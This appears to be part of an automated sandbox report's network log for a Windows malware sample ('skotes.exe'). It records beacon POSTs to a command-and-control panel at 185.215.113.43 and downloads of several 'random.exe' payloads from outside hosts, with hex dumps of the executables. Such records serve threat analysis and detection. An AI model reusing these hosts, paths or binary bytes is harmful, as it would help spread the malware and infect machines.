                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.656182051 CET1236INData Raw: b7 06 57 50 e8 50 a4 00 00 83 c4 08 66 89 06 83 c6 02 39 de 75 e9 89 de 89 f0 5e 5f 5b c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b7 44 24 04 83 c1 08 51 50 e8 1b a4 00 00 83 c4 08 c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 53 57
                                                                                                                                                                                                                                            Data Ascii: WPPf9u^_[D$QPUSWVt$(iC1D$;t$,tbl$0\$DfMF;t$,t<D$D$D$WD$PjD$PSfxL$t$,L$1i^_[]V
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.775032997 CET1236INData Raw: b9 00 00 83 c4 08 c7 06 58 b6 42 00 89 f0 5e c2 04 00 cc cc cc cc cc cc cc cc cc c7 01 08 b3 42 00 83 c1 04 51 e8 1b ba 00 00 83 c4 04 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 89 ce 83 7c 24 08
                                                                                                                                                                                                                                            Data Ascii: XB^BQV|$tVd^"CUSWVPt$D$uJWFFj dFFBB@P<lWWFP


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.649868185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:13.726845026 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 33 35 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                            Data Ascii: d1=1013509001&unit=246122658369
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.076961994 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.64987431.41.244.11805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:15.297434092 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.795213938 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:16 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 1966080
                                                                                                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 17:50:43 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "67572df3-1e0000"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 50 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 86 00 00 04 00 00 68 c0 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PELdP@hZBn@h!0 @T@.rsrch!@d@.idata B@ @) B@klrfnhju`k@auusyycz@@.taggant0P"@
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.795227051 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.795988083 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796077013 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796087980 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796108961 CET672INData Raw: 71 91 75 be 12 71 25 79 29 ec 90 b2 01 33 79 23 1a 10 da 0b 97 b7 31 b3 6f 6d 0f f2 cb 5f 0d 42 58 3c f5 1e d5 8d ad e7 c7 b9 db 03 9a 9e 03 d2 ef f1 2c 58 cb 48 20 1e df 03 98 24 aa ac 81 35 81 5f 67 d5 2b 25 a5 f9 6f 59 3b e3 d5 b3 dc d6 7b df
                                                                                                                                                                                                                                            Data Ascii: quq%y)3y#1om_BX<,XH $5_g+%oY;{8]KZv*I!QU](aEG:!?,(Wm-0+,H[|6FnK.Sf[}m#-:oTb7L*|x/~E(bw.UF|Ct
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796123981 CET1236INData Raw: ad 17 89 05 bd 8f ba d0 aa a7 f6 49 85 cb 50 62 ff 4f bc 09 29 25 ed 46 98 9e d9 db af 71 a0 2f a7 56 8c 7b ad 4a a5 42 37 6c 8d 5f 6f 36 3a 81 68 49 fc 59 37 e3 ef 4d 63 46 54 79 68 d3 bd b2 88 36 aa 35 23 7d c4 b2 fb 70 32 53 38 4a f6 b6 7a 5a
                                                                                                                                                                                                                                            Data Ascii: IPbO)%Fq/V{JB7l_o6:hIY7McFTyh65#}p2S8JzZGNX10zo6[N-n@~nCM=H-]cf`jiFo"$,zb#q!fa7fU1?V'?K/'$~ k2GuJ%zN
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796134949 CET1236INData Raw: 5a 07 99 48 90 b7 8a 79 74 59 8d 85 76 1e 02 aa ba 2d 8e fd 80 db 07 aa 0f a7 9d d2 2d f3 9d f1 71 77 a2 61 9c 0e 7e d0 0b 3a b9 45 e6 37 af cf c3 2e 6a cc 7b 84 75 57 34 98 2f 06 a2 67 1c 4d c2 66 28 38 b2 d3 24 7c ef 5c a6 38 34 97 b4 43 78 f4
                                                                                                                                                                                                                                            Data Ascii: ZHytYv--qwa~:E7.j{uW4/gMf(8$|\84Cx77aYkagmQGRvig{{.57,l/)X/quaV{8w[XWgJ&!<6`ft
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796153069 CET1236INData Raw: ce 72 6c d5 9e f8 17 d1 27 be a4 21 f0 0f 89 df 55 36 ca c6 8d 75 cc 1d 8c 5a 69 43 d2 9e a2 01 e9 4b cc 8e 70 b3 25 65 a2 aa cb 6a 64 4a 95 07 3c e0 42 b2 99 14 f9 21 b3 9d 95 6a 4e 26 fb cd 5a 66 e7 b9 88 09 8d 8f 1c 2e 3f 4e 1c 57 a9 48 af c6
                                                                                                                                                                                                                                            Data Ascii: rl'!U6uZiCKp%ejdJ<B!jN&Zf.?NWH*f>7>:qfQm{O!s2=8^$*9x9) t:Y{+E5]'?^$|Nzyaf?uq
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.796174049 CET1236INData Raw: 64 4e d6 9d 43 90 bf b5 3f 19 ad 3b c0 b4 5a 66 97 ea 98 9f aa ac a5 71 b0 ca 95 55 ab 6d 21 83 6a 57 25 f0 e1 a4 57 f3 ac e8 ca 5d 22 77 43 c2 c0 fd 64 c9 cd 8b aa bd 4c 53 c6 35 5c 65 3d 66 4c 4f 69 e4 18 3f 31 4d 43 97 d5 7c a8 59 8d 71 80 76
                                                                                                                                                                                                                                            Data Ascii: dNC?;ZfqUm!jW%W]"wCdLS5\e=fLOi?1MC|Yqv2uwpr'vQrbcwLkNkhVK!MN-PB]2zi2nhT\l=Fn%*u5 -2ze/O ,IJN2k&7I~U;_s
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:16.902034044 CET1236INData Raw: 8c 2c ab e3 3e 43 e7 08 9e 3f 02 7e cc aa 7b a3 a0 e8 06 02 45 10 e2 9c da af 1a e0 eb 39 90 96 72 03 b1 1f 71 4e e5 d5 a4 a9 90 95 1d 43 ac 84 71 45 e7 ab 59 a0 6e 40 c4 47 d8 41 6a 09 03 22 b0 9c 5a 58 d7 ff df 54 0b e9 56 b6 1a ef b3 40 5f 0f
                                                                                                                                                                                                                                            Data Ascii: ,>C?~{E9rqNCqEYn@GAj"ZXTV@_]Q5$>]$1BOP8Vw7<]F286IX2G$8t+y_,&17LkXagMbu3Cu\L|%]`GOm


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.649892185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:22.736102104 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 33 35 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                            Data Ascii: d1=1013510001&unit=246122658369
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.795254946 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:23 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.649898185.215.113.16805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:23.919569969 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.259911060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:24 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 1858560
                                                                                                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 20:05:43 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "67574d97-1c5c00"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 40 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 49 00 00 04 00 00 9b 7b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUg@I@pI{@\@p0A B@.rsrc0R@.idata @V@ *PX@hkjfghfgP/Z@gtwwivgb0I6@.taggant0@I":@
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260020018 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260042906 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260054111 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260220051 CET1236INData Raw: a0 8b 38 29 0e b4 81 0f 4f 81 11 0c fc ee 81 ca e7 13 d8 a2 40 7b b3 37 90 84 35 c3 b4 ac 00 89 76 26 e1 1e 70 39 92 c0 46 bb 60 75 3b 8a 3a ca b1 1b 7f c3 f8 fb bb 03 8b ff b6 91 5d 3f 98 e0 b7 af b2 f2 27 b4 7c c5 0e f8 97 ee 09 e3 08 c1 cf 32
                                                                                                                                                                                                                                            Data Ascii: 8)O@{75v&p9F`u;:]?'|2&HA/MPOi;*.o)'@EW5C>UZ(NZ,'lnHkBk+q<5g>icK=^3#U+O?G
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260294914 CET1236INData Raw: d2 57 b6 22 5e 55 e0 6c f1 82 89 fa ba fb 87 5e 04 39 09 ce 83 f3 89 9c 17 c0 35 81 ce eb b4 5f 91 02 88 9a 56 ad 19 d6 0c b2 07 ec b0 a4 16 71 43 20 a4 8e 37 9d f2 67 4c ea 4f 3e c5 ac c1 37 67 c0 f1 8a 39 c9 65 20 dd 1a 20 19 8f 3c 0c b3 11 c9
                                                                                                                                                                                                                                            Data Ascii: W"^Ul^95_VqC 7gLO>7g9e <G`^!RhCN>`37+*5R6e>=E-vax@?t\$"5f#n&WH:!K56pK_e2`JQ5HoMnu#*322i:~y.2wz3xs
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260307074 CET1236INData Raw: 8d d7 f1 fe e9 ba 72 a4 84 64 7a cf e3 3e bb f0 67 d5 79 a6 d2 f5 fa c6 81 1a 60 6d b2 a6 20 e0 bc d3 ae 32 8b 87 f3 8a df c4 ff 64 f3 fb 07 fc 7f 99 b2 2e 79 43 bf 40 6b 08 86 85 b9 8c b3 26 91 09 73 29 80 7b ca 28 95 33 b0 d7 81 03 db 31 ff 39
                                                                                                                                                                                                                                            Data Ascii: rdz>gy`m 2d.yC@k&s){(319(u({.s{up)YTFvlYB?S_J?D8YZX:!5^J~H~G!@{J1Dwpb6fX;ri6(uC<}2BtxY~{(
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260514021 CET1236INData Raw: 99 de 7b da 7d 9c 39 c1 3f c6 dc d1 29 c7 41 c9 29 47 5b fd 2d 3f ee 01 df 3b 4e c7 07 96 d0 96 f7 29 9f 9e 65 d2 ca 9b 4c bd 3c 9d 87 d9 3e 49 2b be 07 13 d9 c4 8e 9f 21 1b e4 f3 d1 f2 23 f3 2e 72 dc ff 30 85 4e 88 5e f9 24 df ef 82 a2 39 8e e9
                                                                                                                                                                                                                                            Data Ascii: {}9?)A)G[-?;N)eL<>I+!#.r0N^$9MzLwJr3Vi!C1wmNE#5'kB;AE:V_H>6O^gs<>\p0H|_cNAPn^00I1pUC@P4
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260525942 CET1236INData Raw: 22 7b 96 3e 0c c8 61 96 92 b4 84 61 ab 27 fb b2 0f fa 11 73 f3 ff da 1e bc 3b 08 02 c2 33 f3 82 3b 2e db d6 22 75 42 d7 bd 64 ca 05 b9 ac b6 3c 80 5f ba 14 24 6f 0e 3c 51 b0 73 61 86 a9 99 63 36 e1 db a4 be c9 44 05 53 71 13 cf 0e a0 45 b8 e5 98
                                                                                                                                                                                                                                            Data Ascii: "{>aa's;3;."uBd<_$o<Qsac6DSqEy46CVE+Q9QZrit{CKCvFv%z+?;7i)TgmH)^\W.4<}w)(t{_H_9Pm'Hcq.s.:EDzz;.
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260544062 CET1116INData Raw: 99 af 74 ad 9d 52 45 ff 72 f2 42 16 b2 82 2d 1d 81 24 d9 ae 22 90 79 e9 3f 20 6e e6 31 66 4c 93 e2 af 54 19 c3 02 95 a6 22 8e 77 0b 40 c5 29 ba 9a 3f de 4f b0 39 59 16 40 84 f7 33 b0 17 83 6e 99 21 3d cd bb ce 2c eb 7e 57 d3 d6 6b c3 b6 b1 97 52
                                                                                                                                                                                                                                            Data Ascii: tRErB-$"y? n1fLT"w@)?O9Y@3n!=,~WkRRcSg%f::b//^)/.#uV0)'@?K/mQl?8rYz6{y1H [8.GcCZPvj2^BVMnQ@&rTq2<h4\;uHD
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.379548073 CET1236INData Raw: 03 32 54 c8 60 55 34 2e 62 45 77 fa 57 62 84 eb 86 dd 1d de d7 36 db ea 9a e6 07 b6 32 8a b8 4b a9 a0 eb 8f 34 3d 30 44 71 40 e3 c4 fa 49 44 bd cd f2 0e 31 e1 96 9d 0c cd 88 93 f2 7e 8b 39 49 62 c3 dc 40 8f 23 e9 f4 6a d3 c3 cd 57 6b 89 00 e1 92
                                                                                                                                                                                                                                            Data Ascii: 2T`U4.bEwWb62K4=0Dq@ID1~9Ib@#jWk}2C@)yo9]1"d1zvK8rp{LE&Y(D>I6{_+'pq6RIy%6e>>k'~DA9ZIBE mgO%C


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.649916185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.235374928 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 33 35 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                            Data Ascii: d1=1013511001&unit=246122658369
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.579668999 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.649923185.215.113.16805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.703397036 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.035660982 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:33 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 1831936
                                                                                                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 20:05:50 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "67574d9e-1bf400"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 30 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6a 00 00 04 00 00 df 71 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(0j@`jq@M$a$$ $h@.rsrc$x@.idata $z@ +$|@jkfvjajpPOP~@yofpcxnn j@.taggant00j"@
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.035789013 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036247969 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036258936 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036268950 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037116051 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037188053 CET1236INData Raw: 6a ae 27 d9 b3 9d 09 a8 7e e2 29 a2 e6 51 f8 41 f1 7f 9d 65 07 9c 56 d3 b0 8e fa 57 20 da 25 74 e8 69 fa 6f 9f f2 1f 95 7d 0c 1e ad 3f fc 0c d2 3a 4d 8e aa 79 35 26 c7 44 91 77 e2 6e f3 82 ac a7 8b e6 6f a9 34 d6 e6 f1 70 e2 ef ad 05 11 18 7b f9
                                                                                                                                                                                                                                            Data Ascii: j'~)QAeVW %tio}?:My5&Dwno4p{~NIFpiMu:ao+ovy-!|WiCUg7 Ql-IRt]||~E]Sj)(7RX-
